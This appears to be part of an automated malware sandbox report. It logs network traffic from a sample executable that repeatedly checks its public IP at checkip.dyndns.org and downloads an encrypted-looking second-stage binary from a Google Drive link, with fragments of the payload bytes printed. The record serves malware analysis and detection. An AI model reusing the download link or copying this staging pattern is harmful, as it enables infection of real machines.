Jan 10, 2025 22:44:30.034209967 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ee48d490b0e1798ec42161bbc31dff2e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	50054	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:30.998200893 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:31.590956926 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 910eb7c7f2de250ac6ccab9a48d1a41c Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	50056	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:32.513875008 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:33.096688032 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 18cf14a3ff465978977e9e99ead4e855 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	50058	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:33.974265099 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:34.541562080 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9b19bda87c265f450f5f45447f4ebf6a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	50060	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:35.520284891 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:36.085144997 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 27757e40822fce235f66e86201a8fffb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	50062	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:37.017911911 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:37.644534111 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5697e2ed9fe6f763b1b3a3b8928b06c7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	50064	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:38.678992987 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:39.255393028 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d939ec0bfdd1ddbc9219bde3b7a83713 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	50067	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:40.286942959 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:40.892987967 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 79a55c9505846651bfc2c76e189f62b3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	50069	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:41.806492090 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:42.411880016 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a0182b66b3f76123f13728647749b3ec Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	50071	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:43.504038095 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:44.100224018 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2786cd700588404c23e126a5ea632ca3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	50073	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:45.324461937 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:45.892574072 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5593f0e0cd08fecfe9e367187def10ea Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	50075	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:46.870397091 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:47.434124947 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 996558484b3e21c170db33e3f0e96bfc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	50077	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:48.366087914 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:48.977690935 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:48 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0293b01bb313502bd593252f0412ffb4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	50079	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:50.055474043 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:50.655878067 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:50 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f3608af534bb9f8753a9ada2d288480b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	50081	158.101.44.242	80	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:51.666868925 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:52.233449936 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:52 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4e1aa07275a4dfecd0e40b408ad5dac7 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.6	50083	158.101.44.242	80

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:44:56.217771053 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:44:56.801354885 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:44:56 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b6b6c235b1a8e023e036897de26f7209 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49869	142.250.186.142	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:23 UTC	216	OUT	GET /uc?export=download&id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2025-01-10 21:43:24 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 21:43:23 GMT Location: https://drive.usercontent.google.com/download?id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-RZM_CgbVyXVQt7WDsRo2vg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49875	172.217.18.97	443	6424	C:\Users\user\Desktop\b5BQbAhwVD.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:43:24 UTC	258	OUT	GET /download?id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-10 21:43:27 UTC	4938	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFIdbgQ9QII2T7HBpMpiCHg8-cUojd7kEkqCocUuPkIUEj79x-SYKDfbfpmuoFUz03iOhkwbqtJ4vYg Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="qcmZvgnv224.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 94272 Last-Modified: Tue, 10 Dec 2024 07:03:25 GMT Date: Fri, 10 Jan 2025 21:43:27 GMT Expires: Fri, 10 Jan 2025 21:43:27 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=MXI2jQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-10 21:43:27 UTC	4938	IN	Data Raw: 6d a2 6e 3d 51 e5 2f 67 2c a5 05 28 58 ac bd 8c 5f d1 29 4c c0 6d 28 21 2e 0d a2 38 4e 75 d0 28 f6 00 2d c1 8e 6f c0 77 d2 6a 42 43 c1 b5 c9 65 ee 84 6d ae 68 66 86 11 a5 d6 6c 73 94 57 77 ff aa aa e9 9b 16 56 8a c9 98 62 a1 30 af 27 91 e7 73 b9 a8 76 9e 0a 7a 7f ea ec d9 dc 46 5b d7 c0 8c f8 8b 73 35 67 7e f9 c6 e0 a3 84 89 7b 2e 61 f1 4a 62 6a ee 22 48 29 4b b6 c3 66 88 40 28 64 a2 f7 38 7d 5c 6b db c8 7b 8c 2f 12 35 f3 fd 9f d6 b8 45 90 6f e4 a4 c8 76 38 90 46 2b 77 d1 cd af 6b fe 20 dc 7f f1 ce cb 59 6d 9c 7d 3e b8 1b 34 86 a7 9f 5a 66 3b eb 71 c8 6b 22 f0 53 ef c9 d9 4d c5 73 11 3f 24 5c 62 a2 a9 b8 03 27 eb 7d a7 c3 c4 14 41 75 da da 07 b5 bf 40 d3 ca 05 08 3a 49 a2 ca 3f cd fd 0d dc ed 50 bf 85 5d 0a 16 54 a7 ad 25 c6 68 a3 cf 56 dc 11 f8 8c fe 3f Data Ascii: mn=Q/g,(X_)Lm(!.8Nu(-owjBCemhflsWwVb0'svzF[s5g~{.aJbj"H)Kf@(d8}\k{/5Eov8F+wk Ym}>4Zf;qk"SMs?$\b'}Au@:I?P]T%hV?
2025-01-10 21:43:27 UTC	4820	IN	Data Raw: fc ba de b7 7b 59 c2 ba 81 fb 07 03 a5 4a a7 fa 2d 0d de 7b be 62 cc ad fd 37 9f f6 b5 b4 66 e5 89 1f 71 c9 aa 20 b9 2e 30 eb 04 97 ef c1 95 2f b2 b9 58 fc ce 6c e4 1e 6a f2 42 3d c4 df b1 cd cb fc cc 28 88 a8 eb 54 7b 21 9a 44 2d 1c 8b 32 38 c3 7a 5e 7e d6 9b ff f3 9d 44 25 0e 34 43 3e 82 b9 f0 51 ad 55 9a a9 c5 58 a6 3f 2d 78 46 2b a0 85 03 ca 41 58 96 25 a8 6f a2 3c 90 11 7a cc 24 cf cd 2d 33 90 27 63 1b ff 86 c9 85 47 a3 88 a1 06 3a 19 f3 82 14 e2 5f 87 af be d2 74 8b 73 0d 47 85 b8 86 de 29 b8 98 f0 4e 2e 0d e9 d6 99 bc 8f ed 0c ee 04 22 fa da 58 48 8f b2 b3 d8 ef 20 d9 01 25 52 ab 8b 4e c2 dd 9b b1 95 8f d7 ef 94 d2 ba a6 8d 31 34 fb 6c 81 25 1f 79 4a 81 d4 47 10 23 ea b0 80 14 0b fd 88 0c fb 55 09 a5 48 65 37 d1 6a 26 93 e0 5b 5a a7 dd 55 9d f1 32 Data Ascii: {YJ-{b7fq .0/XljB=(T{!D-28z^~D%4C>QUX?-xF+AX%o<z$-3'cG:_tsG)N."XH %RN14l%yJG#UHe7j&[ZU2
